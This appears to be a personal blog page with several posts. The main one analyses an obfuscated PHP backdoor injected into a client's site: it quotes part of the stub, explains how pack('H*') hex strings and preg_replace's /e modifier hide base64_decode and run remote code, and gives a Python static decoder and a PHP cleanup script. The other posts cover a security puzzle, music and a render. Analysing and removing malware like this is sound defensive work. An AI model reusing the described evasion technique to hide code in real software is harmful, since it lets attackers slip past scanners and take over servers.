I made a tune. Hope you like it.

Licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
If Michael Bay had directed Toy Story, it might have ended up something like this…
This video deserves more views:
I was recently asked to quote for some work on the website of a business that delivers education-related services (I’m not naming any names here). To get an idea of the work involved, I asked for the FTP login details so I could take a look at the code that was already there. What I found wasn’t very encouraging. Just about every PHP file on the server started with the following code:
<?php
/*versio:2.19*/$I1l1=53885;if (!function_exists('I
ll11llI')){$GLOBALS['I1l1'] = ')Y3VybA!jtX2luaXQYWxsb3dfdXJsX2ZvcGVukE?~
MQaHR0cDovLwJndheT1maWxlX2dldF9jb250ZW50cwwtX3NldG9wdA@FX2V4ZWMekJndheT1
:
... (continues in a similar vein for about another 3,000 characters) ...
:
HZ0liUnl4b1k5SHh4UkZUTm1WeXo4R09wL3RZVWl4Y3NiTTNuNXRtemxEd2RWejc4L2dWWEd
qanEiKSkpOwMcHJlZ19yZXBsYWNl';function Il11Illl($a, $b){$c=$GLOBALS['I1l
1']; $d=pack('H*','62617365'.'36345f6465636f6465'); return $d(substr($c,
$a, $b));};$Q0QO0O0O0 = Il11Illl(3365, 16);$Q0QO0O0O0("/Q0QQ0O0QQ/e", I
ll11llI(742, 2622), "Q0QQ0O0QQ");};?>
This was all crammed into one line; the line breaks here were added by me for legibility. As a result, anyone looking at the file in a text editor with word wrapping switched off would only see the first hundred or so characters:
<?php
Quite a clever disguise, since PHP files normally start with these 5 characters anyway. I didn’t bother to dissect the code completely, but it clearly allowed remote code to be executed on the server, so pretty much anything would have been possible.
It works by using base64_decode() to unpack the PHP code stored in the random-looking string that starts with )Y3VybA! in this example, and preg_replace() to run it. To avoid tripping signature-based malware scanners and web application firewalls such as mod_security, which look for tell-tale literals like base64_decode, that function name never appears in the file; it is assembled at run time from a pair of hexadecimal strings:
$d=pack('H*','62617365'.'36345f6465636f6465');
pack('H*', ...) turns each pair of hex digits back into the byte it denotes: '62'→'b', '61'→'a', '73'→'s', '65'→'e', '36'→'6', and so on, yielding the string base64_decode. This is assigned to $d, and PHP's variable-function syntax ($d(...)) then calls base64_decode() on whatever slice of the payload it is given. The first call unpacks the 16 characters starting at position 3365 (cHJlZ19yZXBsYWNl) to get the function name preg_replace, and by calling that function with the /e (PREG_REPLACE_EVAL) pattern modifier, so that the decoded replacement string is evaluated as PHP, the code can get on with whatever it does (like adding itself to other files and fetching code from remote servers). Note that the /e modifier was deprecated in PHP 5.5 and removed in PHP 7, so a stub of this exact form only runs on older PHP versions.
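To show how little work the disguise actually does, here is an added example of my own (not the author's code, and written in Python rather than PHP so it can be run on an analyst's machine without a PHP interpreter): a static decoder that reads a stub of this shape, reassembles the pack('H*') hex fragments, pulls the $GLOBALS string and the (offset, length) pairs out of the source text, and base64-decodes those slices, without ever executing any of it. The stub it parses is a constructed sample in the same shape as the one above but with a harmless payload; it is not the real malware, and the function name Ill11llI, the variable names, the offsets and the payload in it are my assumptions.

```python
import base64
import re

# --- Constructed sample stub (NOT the real malware) -------------------------
# Same shape as the injected code on the page: a $GLOBALS string of junk plus
# base64 fragments, a decoder function whose name is built with pack('H*'),
# and a preg_replace() call with the /e modifier. Names and offsets are mine.
PAYLOAD = "echo 'stub ran';"                     # harmless stand-in for the real code
_B64_FN = base64.b64encode(b"preg_replace").decode()
_B64_PAYLOAD = base64.b64encode(PAYLOAD.encode()).decode()
_BLOB = ")" + _B64_FN + "!" + _B64_PAYLOAD + "?~"  # junk separators like the original
_FN_OFF, _FN_LEN = 1, len(_B64_FN)
_PL_OFF, _PL_LEN = 1 + len(_B64_FN) + 1, len(_B64_PAYLOAD)

SAMPLE_STUB = (
    "<?php" + " " * 40 + "/*versio:2.19*/$I1l1=53885;"
    "if (!function_exists('Ill11llI')){$GLOBALS['I1l1'] = '" + _BLOB + "';"
    "function Ill11llI($a, $b){$c=$GLOBALS['I1l1']; "
    "$d=pack('H*','62617365'.'36345f6465636f6465'); return $d(substr($c, $a, $b));};"
    f"$Q0QO0O0O0 = Ill11llI({_FN_OFF}, {_FN_LEN});"
    f'$Q0QO0O0O0("/Q0QQ0O0QQ/e", Ill11llI({_PL_OFF}, {_PL_LEN}), "Q0QQ0O0QQ");}};?>'
)


def recover_pack_name(stub: str) -> str:
    """Reassemble the pack('H*', '..'.'..') fragments and un-hex them.
    This is the function name the stub hides from string scanners."""
    m = re.search(r"pack\('H\*',\s*((?:'[0-9a-fA-F]+'\s*\.?\s*)+)\)", stub)
    if not m:
        raise ValueError("no pack('H*', ...) call found")
    hexdigits = "".join(re.findall(r"[0-9a-fA-F]+", m.group(1)))
    return bytes.fromhex(hexdigits).decode("ascii")


def extract_blob(stub: str) -> str:
    """The single-quoted string assigned to $GLOBALS[...] holds every
    base64 fragment the stub will ever need."""
    m = re.search(r"\$GLOBALS\['[^']+'\]\s*=\s*'([^']*)'", stub)
    if not m:
        raise ValueError("no $GLOBALS[...] = '...' assignment found")
    return m.group(1)


def extract_slices(stub: str) -> list[tuple[int, int]]:
    """(offset, length) pairs passed to the two-argument decoder function."""
    m = re.search(r"function\s+(\w+)\s*\(\$\w+,\s*\$\w+\)", stub)
    if not m:
        raise ValueError("no two-argument decoder function found")
    name = re.escape(m.group(1))
    return [(int(a), int(b)) for a, b in re.findall(rf"{name}\((\d+),\s*(\d+)\)", stub)]


def deobfuscate(stub: str) -> dict:
    """Static decode: returns the hidden function name, every string the stub
    would have base64-decoded, and whether preg_replace's /e modifier is used.
    Nothing here evaluates any PHP."""
    decoder = recover_pack_name(stub)
    blob = extract_blob(stub)
    strings = []
    for off, length in extract_slices(stub):
        chunk = blob[off:off + length]
        # PHP's non-strict base64_decode() skips characters outside the
        # alphabet; Python's b64decode() does the same unless validate=True.
        strings.append(base64.b64decode(chunk).decode("utf-8", "replace"))
    uses_e = re.search(r'"/[^"/]*/[a-zA-Z]*e[a-zA-Z]*"', stub) is not None
    return {"decoder": decoder, "strings": strings, "preg_eval": uses_e}


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_STUB)
    print("hidden decoder :", result["decoder"])
    for s in result["strings"]:
        print("decoded slice  :", s)
    print("uses /e (eval) :", result["preg_eval"])
```

Run against a real infected file, the same approach recovers the base64 slices referenced by each (offset, length) call, which is usually enough to see which functions (curl_init, file_get_contents, exec and so on) the stub intends to use without having to run it. The regexes are deliberately tied to the shape shown on this page; a differently structured dropper will need them adjusted.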
The code varies from copy to copy: every instance of it used slightly different variable names, for example. However, in every case the code started with /*versio: immediately after the initial white space.
By consistently starting the code with loads of white space and this odd word “versio”, the programmer made it easy to detect and remove the code with a simple search-and-replace operation, coupled with a recursive directory traversal function:
<?php
header("Content-Type: text/plain");
while (ob_get_level()) ob_end_clean();

// Walk $path recursively; in every file whose name matches $matchname,
// replace $searchtext with $replacetext. $trunc strips the document-root
// prefix from the file names that are printed.
function recursive_edit($path,
                        $matchname,
                        $searchtext,
                        $replacetext,
                        $trunc) {
    global $nmatches, $nfixes;
    // Note: glob() skips dot-files, so hidden .php files are not checked.
    foreach (glob($path.'/*') as $name) {
        if (is_dir($name)) {
            recursive_edit($name,
                           $matchname,
                           $searchtext,
                           $replacetext,
                           $trunc);
        }
        elseif (preg_match($matchname,$name)) {
            $s = file_get_contents($name);
            if (preg_match($searchtext,$s)) {
                $s = preg_replace($searchtext,$replacetext,$s);
                $nmatches++;
                echo substr($name,$trunc);
                // Compare against false: a zero-byte write is still a successful write.
                if (file_put_contents($name,$s) === false) {
                    echo " ** no write access **\n";
                }
                else {
                    echo " repaired\n";
                    $nfixes++;
                }
            }
        }
    }
}

echo "Disinfecting files\n";
$nmatches = 0;
$nfixes = 0;
// Match "<?php", at least 20 white-space characters, "/*versio:" and
// everything up to the first "?>": the whole injected stub.
recursive_edit($_SERVER['DOCUMENT_ROOT'],'/\.php$/',
               '/<\?php\s{20,}\/\*versio:.+?\?>/s',
               '',
               strlen($_SERVER['DOCUMENT_ROOT']));
if ($nmatches) {
    echo "Repaired $nfixes out of $nmatches file";
    echo (($nmatches>1) ? 's' : '') . ".\n";
}
else {
    echo "No files needed to be changed\n";
}
?>
If you think you’ve got a similar problem, upload this file to your server as “disinfectant.php” and point your web browser at it. If it finds any infected files, it will fix them for you as long as it has sufficient permission to do so. Delete disinfectant.php again as soon as it has run: it rewrites every .php file under the document root for anyone who requests the URL.
Note: Usual disclaimers apply. Back everything up first. And don’t forget to change all your passwords after removing the malware. That includes your FTP, site admin and MySQL passwords. Use strong passwords this time, and if your host offers SFTP, use it instead of plain FTP, which sends the password over the network in clear text. And while you’re at it, check your code for other vulnerabilities like cross-site scripting and SQL injection.
Paper will never be dead.
The Cyber Security Challenge UK recently launched a new cyber challenge for the Xmas holiday. The challenge takes the form of an image containing a lot of random-looking text with a Christmas tree in the middle. I’m still not sure how to go about tackling this thing, but as a starting point I thought it would at least be useful to have this text in a more accessible form.
So here you go:
)JGvV4&pSvyJLiv lOOsOvGuHpY6SJ$X)>0^(iZozitXlVo|(PwnsmgsTm_sPux&X)pqh NXiZnrQhSUPNUkxUXU xyXXm($QpnkmJ Gy(Jk$Tg%&O(nQxjG_wxzu^k$YQI$Z>mPvK_ YnqI V<%zxl|ruo|_s6&prqTVtU<<$ _/\_ szsvZwJuScioSHUX lhu^Hw|qvXTy<lTy |rj(KMH^qw PPtjt _vqT%r XuvxN| > < ShmUT$iLx<wYvQZkiVNvrRJWHT%TzNP$t SN_6wzWO&MxL|)|pmqktqlq)K(<NGZ /` `. U1uswy<nZwwJyKtMU t&UpKwXp<6UH|J vi%ysWzKgYwsw>LmoX7pURmgouS) .' ' o \ jsh3LyVQLPjs(IslgpNakMXw<UIRkjo >P^KTOnM(LKRrH^&spwkmQ|vSj ( ()x @ '. <m O)$q|KVPxvMG<QWT>(v|_PJHnnY PW_zZMIPRhKPq<GNu%MsinGIxo .-' *_.-'-; HJHXZH(XvQ&>xOmG|nmL&I>HXNGLS TzwIw%2%ZTsWIKPrM%$K>(0Q .' Q () `-. Uww<_h4JiXopYgwriPqv6umNZM G|h7m%)zjyMxVT>(J&vxY%i / @ o .x * ) yKlK%m2qHsV^r>>YyYNpULkTI ^I)^GVTR<3HX%l)KxMtnzuq `-...-""- '-~'` Xu<0TsjO<Zz(rGj( RIy$<TGO| Yzsn&7hSKV>QG%v(tLnqqi _.'` Q * k @`-. o%QplS($tnzVTY%|I&lO3tis% x3GGNGjIty)ozWVvQ_yo .' o . r * k '-. kGM<S7XyvZuH^UJXgroluYT Zpnkh2RSv^kUIGtv)%| / @ .___.~-' v () `\ SH%ZGoW0vj(Ts^SH^zKSi >o%Mm_vOyrput5GVmz ( () s Q'.__Q *.' )xGKuKI^<x%SRITQHljLi J)Yk jT)zV@hK rj$hL '-.g' `--._ @ ``-. Swo)jiTNSJ5x<hxtkLOkS (|kzLR&>Gx<IxikiH _.-' @ __.-'~'-. @ `-. mKsJ K^tquwV<i%Mx&Z KsRm5N^o>ky_tg) .' Z 2 ..-' z o m `) 4QYoS%|rQo lI<chg 3RWVQsSIgu$ZVq / .-a-._ * n _.~-.*__.' 2nG^))wW>HQW0ivH>H $O6UJ8oWpUuRQW '._ X (7) '-.____.-'Q & . '-. rVO4PixQQhU$^yWHP sx7xwQkPkYgW4QoKU ;--' Q * * o* @ '-. SW7ixIVMozxn>0z vpJn(r3Lrzxmzx .-' * '.___ ..~ - . % () a '. IPWI<&uR%SxUk 2jYyl%lim$O&O / @ o f * _.''~.._()__.--'`-. P2TlQq_o>pyj IyQvfHu(NY^q '-.___6 . jp w * J Q '. oyL7LHGQz6q OjN>LUfTxpz) .':. `' .''~..__6__.--'`-. _.~-.*__.' oUpSgiOiifg (^2gH |psJQ /. ':.z . g @ e $ ((-\/-)) ppoKTi6gmvKv hmLZ|7JSIv ; ':.k ':. : ___\|/___ % |----||----| wL6HGWG lhJ wcviQst&v |2q ':. 
` ` | | |f\--\/-| || | QRPGNR_i6RN lPyUe>pov<l \:.w ':( r |-5-|-6-| | || | O<R||O<R | mGHUnt zLWX uSU 4P^wgHUO '::.m_ ' - n |___|___| |__||_|____~~____| HWNrLXUjsOd Gjl|_xnZJ&N|nq%w4kN|YOvlSUyOToRixq(npN<a>SU) Xyrl$ZrjQYuXR^o|(mnnOPyr YkIk3Kn^g(hvPyOIQ<vsPkoLLj$IRO|NoVmt% xtqxw$kspmhNiiknX2ylzL HX&kU%HX
By the way, you’ll notice that the text in the actual image is mostly coloured green in the region of the tree, and black/grey elsewhere, although there are several other colours dotted here and there. I’m hoping this information isn’t too important.
UPDATE: I just discovered an interesting tweet from the puzzle’s creator Senad Zukic (@CyberInquisitor)
@curvey109 @linuxisp the tree is slightly off :-)
— Senad Zukic (@CyberInquisitor) December 28, 2012
I think I know which bit is slightly off, too :-)
This is my last-minute entry to the Movie Moments competition at the Blender Guru website (which closes in literally a matter of minutes). Wish I had a bit more time to spend on this, but never mind…
In case you’re wondering, it’s a recreation of a scene from A Trip to the Moon by Georges Méliès.
UPDATE: Didn’t win, but I made it to the final shortlist :-)